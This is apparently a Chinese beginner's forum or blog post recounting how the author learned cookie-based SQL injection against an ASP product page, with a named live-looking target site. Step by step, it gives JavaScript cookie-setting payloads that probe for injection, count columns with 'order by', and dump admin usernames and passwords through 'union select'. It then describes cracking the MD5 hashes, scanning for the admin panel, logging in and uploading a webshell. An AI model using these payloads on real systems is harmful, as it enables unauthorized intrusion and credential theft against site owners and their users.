关于cookie注入的初级的
今天晚上一个晚上终于把cookie注入和union联合注入搞定了,感谢H.U.C-农民,他给的站,他教的我,十分感谢~~
cookie注入原来感觉很难,现在感觉就那样了~~
第一步:首先进入一个网站,点击几个链接,使网址带上参数(如:http://www.XXX.cn/ProductShow.asp?ID=250);
第二步:后面加'判断是否进行了防注入(http://www.XXX.cn/ProductShow.asp?ID=250),发现防注入了。
第三步:使用javascript:alter(decument.cookie="ID="+escape("250"));进行注入中转(好像是这么叫的)(注意:这里的ID要和上面网址里面的对称,即他是大写就用大写,是小写就用小写,250和上面一样,上面是多少就)
第四步:判断是否有注入漏洞:javascript:alter(decument.cookie="ID="+escape("250 and 1=1"));返回正常。
javascript:alter(decument.cookie="ID="+escape("250 and 1=2"));返回错误,说明有注入漏洞。
第五步:判断字段大小:javascript:alert(document.cookie="ID="+escape("250 order by 10"));正常。
javascript:alert(document.cookie="ID="+escape("250 order by 50"));出错。
javascript:alert(document.cookie="ID="+escape("250 order by 25"));正常。
javascript:alert(document.cookie="ID="+escape("250 order by 30"));出错。
javascript:alert(document.cookie="ID="+escape("250 order by 26"));正常。
javascript:alert(document.cookie="ID="+escape("250 order by 27"));出错。
在检测字段大小的时候需要注意(我们要打开两个http://www.jlak.cn/ProductShow.asp?ID=250,i一个用来改代码,一个改为http://www.jlak.cn/ProductShow.asp来不断刷新查看返回)。
第六步:检测表段: javascript:alert(document.cookie="ID="+escape("250 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin"));(字段是多少个,就写多少个数)
刷新http://www.jlak.cn/ProductShow.asp发现网页上出现了几个数字,选两个用username,password替换掉,比如我是2,7,那就javascript:alert(document.cookie="ID="+escape("250 union select 1,usename,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin"));
刷新,用户名和密码就出来了
第七步:MD5解密
第八步:御剑扫后台:登入,随便想干什么就干什么,传马这里不说了,我也不是很熟~